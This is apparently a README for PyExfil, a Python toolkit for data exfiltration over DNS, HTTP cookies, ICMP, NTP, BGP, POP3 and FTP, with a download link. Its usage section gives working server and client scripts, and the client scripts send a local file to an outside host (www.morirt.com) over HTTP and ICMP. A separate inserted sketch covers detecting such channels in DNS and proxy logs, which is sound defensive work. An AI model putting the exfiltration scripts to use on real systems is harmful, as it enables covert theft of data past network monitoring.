PyExfil started as a Proof of Concept (PoC) and has turned into a Python data exfiltration toolkit that implements various techniques built around commonly allowed protocols (HTTP, ICMP, DNS, etc.).
The package is at a very early stage (alpha release) and is not fully tested; the author welcomes feedback and commits.
Features
Currently PyExfil supports:
- DNS query
- HTTP Cookie
- ICMP (8)
- NTP requests
- BGP Open
- POP3 Authentication (as password)
- FTP MKDIR technique
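For defenders, the DNS query and HTTP cookie channels in this list can be screened in resolver and proxy logs. The sketch below is an added example, not PyExfil code: it assumes exfiltrated chunks show up as unusually long, high-entropy DNS labels or cookie values, and its thresholds, function names and sample records are all constructed for illustration.

```python
import math
import string
from collections import Counter

# Thresholds are assumptions for illustration; tune them against a baseline.
MAX_DNS_LABEL_LEN = 30
MAX_COOKIE_VALUE_LEN = 128
MIN_ENTROPY_BITS = 4.0  # bits per character

def shannon_entropy(text):
    """Bits per character of the empirical character distribution."""
    if not text:
        return 0.0
    total = len(text)
    return -sum(n / total * math.log2(n / total) for n in Counter(text).values())

def looks_encoded(value, max_len):
    """True only when a field is both unusually long and high-entropy."""
    return len(value) > max_len and shannon_entropy(value) >= MIN_ENTROPY_BITS

def check_dns_query(qname):
    """Flag a query name if any single label looks like encoded data."""
    return any(looks_encoded(label, MAX_DNS_LABEL_LEN)
               for label in qname.rstrip(".").split("."))

def check_cookie_header(header):
    """Flag a Cookie header if any cookie value looks like encoded data."""
    values = (pair.strip().partition("=")[2] for pair in header.split(";"))
    return any(looks_encoded(v, MAX_COOKIE_VALUE_LEN) for v in values)

def scan(records):
    """Return (kind, source) for every record that trips its check."""
    checks = {"dns": check_dns_query, "cookie": check_cookie_header}
    return [(kind, src) for kind, src, field in records if checks[kind](field)]

# Constructed sample records (kind, source address, observed field).
CHUNK = string.ascii_lowercase + string.digits            # stand-in payload
SAMPLE = [
    ("dns", "192.0.2.10", "www.example.com"),
    ("dns", "192.0.2.10", "a" * 45 + ".example.com"),      # long, low entropy
    ("dns", "192.0.2.77", CHUNK + ".example.com"),         # long, high entropy
    ("cookie", "192.0.2.10", "sessionid=abc123; theme=dark"),
    ("cookie", "192.0.2.77", "sid=" + CHUNK * 4),
]

if __name__ == "__main__":
    for kind, src in scan(SAMPLE):
        print("suspicious %s field from %s" % (kind, src))
```

Requiring both length and entropy keeps long but repetitive fields, such as padding, from raising alerts.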
Usage
HTTP Exfiltration Server
```python
#!/usr/bin/python
from exfiltration.http_exfiltration import *


def main():
    print("Starting a listener: ")
    # Listen for incoming HTTP exfiltration requests on the loopback address.
    listen("127.0.0.1", 80)


if __name__ == "__main__":
    main()
```
HTTP Exfiltration Client
```python
#!/usr/bin/python
from exfiltration.http_exfiltration import *


def main():
    FILE_TO_EXFIL = "/bin/bash"
    ADDR = "www.morirt.com"

    # send_file() returns 0 on success.
    if send_file(ADDR, FILE_TO_EXFIL) == 0:
        print("File exfiltrated okay.")
    else:
        print("Damn thing failed.")


if __name__ == "__main__":
    main()
```
ICMP Server
```python
#!/usr/bin/python
from exfiltration.icmp_exfiltration import *


def main():
    ADDR = "127.0.0.1"
    TMP_PATH = "/tmp/"
    # Start the ICMP listener on ADDR, passing it the temporary path.
    init_listener(ADDR, TMP_PATH)


if __name__ == "__main__":
    main()
```
ICMP Exfiltrator
```python
#!/usr/bin/python
from exfiltration.icmp_exfiltration import *


def main():
    FILE_TO_EXFIL = "/bin/bash"
    ADDR = "www.morirt.com"

    # send_file() returns 0 on success.
    if send_file(ADDR, FILE_TO_EXFIL) == 0:
        print("File exfiltrated okay.")
    else:
        print("Damn thing failed.")


if __name__ == "__main__":
    main()
```
You can download PyExfil here:
Or read more here.